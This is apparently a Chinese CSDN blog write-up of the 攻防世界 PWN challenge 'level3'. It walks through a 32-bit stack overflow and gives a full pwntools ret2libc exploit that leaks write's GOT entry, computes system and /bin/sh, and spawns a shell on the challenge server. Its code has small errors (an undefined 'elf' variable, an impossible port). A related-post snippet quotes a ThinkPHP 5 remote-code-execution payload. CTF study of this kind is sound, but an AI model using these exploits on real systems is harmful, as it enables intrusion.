攻防世界Level3

最新推荐文章于 2022-06-18 22:14:07 发布
最新推荐文章于 2022-06-18 22:14:07 发布
阅读量292 收藏 1
点赞数 1
分类专栏: PWN 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WangLal/article/details/118492151
版权

攻防世界PWN新手题

level3的WP

基本三步:checksec,file,执行文件在这里插入图片描述

只开了NX防护,且是个32位的文件

放进IDA中查看

main函数中只调用了一个函数,vulnerable_function(),进入函数中查看
发现read函数可以制造栈溢出漏洞。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
要注意,题目还给了一个库,level3的文件中没有System函数,所以只能调用库中的函数。同时,文件PIE没开代表libc中函数的编移量就是固定的,只要确认了libc的基址,然后计算出system函数的offset,就可以定位到system函数的真实地址,实现调用,最后get shell。
思路是有了,但实际上做起来,却完全不知道怎么做,只好去看大佬们的WP,才发现自己有很多知识都不懂,不知道,最后看了许多大佬的博客,才真正明白这题的做法。
大家可以看这两位大佬的博客
https://blog.csdn.net/elsa________/article/details/102459658
https://www.cnblogs.com/diaolan/p/13878518.html

EXP

from pwn import *

r = remote(" 111.200.241.244",551368)
#r = process(’./level3’)

context.log_level = ‘debug’
e = ELF(’./level3’)
libc = ELF(’./libc_32.so.6’)
#plt和got表的区别和用法,可以看这个博客
https://blog.csdn.net/qq_18661257/article/details/54694748
write_plt = elf.plt[‘write’]
write_got = elf.got[‘write’]
main_addr = elf.sym[‘main’]
#b’aaaa’为ebp,p32(1)和p32(4)为write函数的第一,三个参数,以write函数的got的地址为第二个参数,从而获得write的函数地址
payload = b’a’*0x88 + b’aaaa’+ p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)

r.sendlineafter(“Input:\n”,payload)
#u32为解包
write_got_addr = u32(r.recv())
print(hex(write_got_addr))
#获取libc的基址
libc_addr = write_got_addr - libc.sym[‘write’]
print(hex(libc_addr))
#获取system的地址
sys_addr = libc_addr + libc.symbols[‘system’]
print(hex(sys_addr))

#计算字符串 /bin/sh 的地址。0x15902b为偏移,
#通过命令:strings -a -t x libc_32.so.6 | grep “/bin/sh” 获取
bin_sh_addr = libc_addr + 0x15902b
print(hex(bin_sh_addr))

#get second payload
#调用system函数,并设置/bin/sh的参数
payload2 = b’a’*0x88 + b’aaaa’ + p32(sys_addr) + b’aaaa’ + p32(bin_sh_addr)

r.sendline(payload2)
r.interactive()在这里插入图片描述

成功get shell

Wanglpl
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-Web进阶篇-007php_rce】
gyy990526的博客
03-14 2246
解:打开靶机提示了是ThinkPHP V5的远程代码执行漏洞,V5.0、V5.1均有此问题 构造payload,查看目录 payload:/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 用ls /flag和find / -name'flag'效果一样都可以找到flag文件 payload:/?s=index/think\app/
攻防世界pwn新手区题解-level3
weixin_62621015的博客
04-17 848
攻防世界pwn-level3详细题解。
攻防世界 Bug
CyhDl666的博客
02-24 899
进入界面随便注册一个root账号 点击Manage 页面返回Sorry,You are not admin! 需要用 admin账号 注册发现该账号已经被注册过了 发现有一个Findpwd界面 可以重置密码 问题来了 我不知道admin账号的生日和地址 先尝试一下改自己前面申请的root账号 改一下密码试试 这里要一直抓包 改掉username为admin尝试了一下 依然是成功的 所以这里admin的账号的密码就被改了 用admin登录 进入manage界面有提示IP NOT allowed burp.
攻防世界 Web disabled_button
MrTreebook的博客
02-26 423
攻防世界 Web disabled_button1.打开题目环境2.检查前端代码 本题主要通过简单的前端代码即可解决 1.打开题目环境 2.检查前端代码 找到提交表单 删除这个disable即可 得到flag cyberpeace{fdf23881525e4cb089b90159003a2801} ...
[攻防世界]level3
逆向萌新的博客
06-18 363
[攻防世界]level3,详细
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952541
攻防世界-level3-Writeup
SkYe's Blog
05-15 483
level3 [collapse title=“展开查看详情” status=“false”] 考点:栈溢出、ROP(ret2libc) ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] write(1, "Input:\n", 7u); return read(0, &buf, 0x100u); //溢出 } 打开了 NX 保护栈数据不可执行,程序没有预留后门。解决办法就是 ret2libc ,这
easychallenge攻防世界
Bigotry77的博客
04-29 261
Easychallenge 题目描述:你们走到了一个冷冷清清的谜题前面,小鱼看着题目给的信息束手无策,丈二和尚摸不着头脑 ,你嘿嘿一笑,拿出来了你随身带着的笔记本电脑,噼里啪啦的敲起来了键盘,清晰的函数逻辑和流程出现在 了电脑屏幕上,你敲敲键盘,更改了几处地方,运行以后答案变出现在了电脑屏幕上。 附件下载下来发现是一个.pyc文件 pyc文件就是 py程序编译后得到的字节码文件 (py->pyc),python为了提高运行效率也会进行编译,有时候编译出pyc文件后,删除py文件也不会出错.
攻防世界(新手篇)
热门推荐
sjt670994562的博客
06-02 1万+
作为刚刚进入reserve的小白,这几天在攻防世界的一些解题 no_strings_attached 一看没有exe,估计是linux的文件了,扔进C32Asm里 果然elf文件 先用扔进ida分析,发现主要函数authenticate,找到他的地址 OK,接下来就是扔到linux的gdb里面分析啦(这里我用的是peda显示的更方便点) 用b来下断点,b*0x08048708,然后r运行,n单...
攻防世界做题记录
qq_51177088的博客
03-13 235
** 攻防世界做题记录 bugku web7 //多次抓放包得到flag 原本思路: 抓包发现有提示:flag is here 想利用burp suite使函数调用停止或变慢,然后查看flag 但是由于知识有限就只能慢慢抓放包 baby_web 提示初始界面,于是想到index.php,用burp抓包后得到flag Training-WWW-Robots 由root协议直接在url后输入robot.txt发现禁止爬取的网页 在url后输入f10g.php即可获得flag Web_php_includ
攻防世界 level3
10-03 2690
1.题目 2.IDA分析 3.流程分析 流程很简单,直接输入一串字符,然后结束。从IDA反汇编成C程序代码看,read方法这里存在明显的栈溢出。但这道题的真正难点在于,程序本身没有可用的函数(system函数),也没有可用的函数参数(“/bin/sh”)。也没有更多的输入点给我们利用。但是题目给了我们一个动态库,意思很明显,就是利用动态库的方法和参数。 首先,使用 strings -at x libc_32.so.6 | grep bin/sh 查看动态库是否存在我们需要的字...
攻防世界pwn-level3】
a_silly_coder的博客
02-17 3255
下载文件后首先查看保护,发现可以进行栈溢出攻击 将文件拖入32位ida 进入vulnerable_function后,发现了read处有栈溢出漏洞 在查看代码后,发现没有提供system和bin/sh,但是由于给了libc,所以可以找到libc的偏移量,然后计算出system和bin/sh的加载地址。 对于plt表,got表,实际加载地址,我是这么理解的:通过elf.plt['write']获取到的是write在plt表中的地址1,这个地址1上存放的实际内容是write在got表的地..
攻防世界 pwn level3
Bsecure的博客
06-06 1000
level3 开始查保护后没注意到NX,在栈上几次没执行成功才回去看到。这个题实际还是栈溢出,但多考了很多知识点,对刚接触pwn收获还是很大。 首先查保护,只开了NX,没有canary,那就可以往靠溢出控制程序走向了的方向看题。 载入ida后,栈溢出很明显。 但利用起来,既没有有system函数,也没有’/bin/sh’。这对于刚接触pwn还是比较困难的,但本来就学习的过程,看了writeup又去学了下.plt与.got再来做的题。 其实程序带了一个运行库的,里面有动态链接库的函数
攻防世界 新手区 level3
winterze的博客
04-04 386
分享一位师傅写得,很详细,对我们小白很有帮助 https://www.cnblogs.com/cloud-tree/p/11929585.html 攻防世界 新手区 level3 0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/level3' Arch: i386-32-little RELRO: Partial RELRO Stac...
攻防世界pwn(4)
weixin_44319142的博客
04-12 639
int_overflow level3
攻防世界 unserialize3
最新发布
08-16
攻防世界中,unserialize3 可能是指 PHP 序列化和反序列化的第三个版本。序化是将对象转换为字节流过程,而反序列化则是将字节流转换回对象的过程。这些功能在 PHP 中通过 serialize() 和 unserialize() 函数实现...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值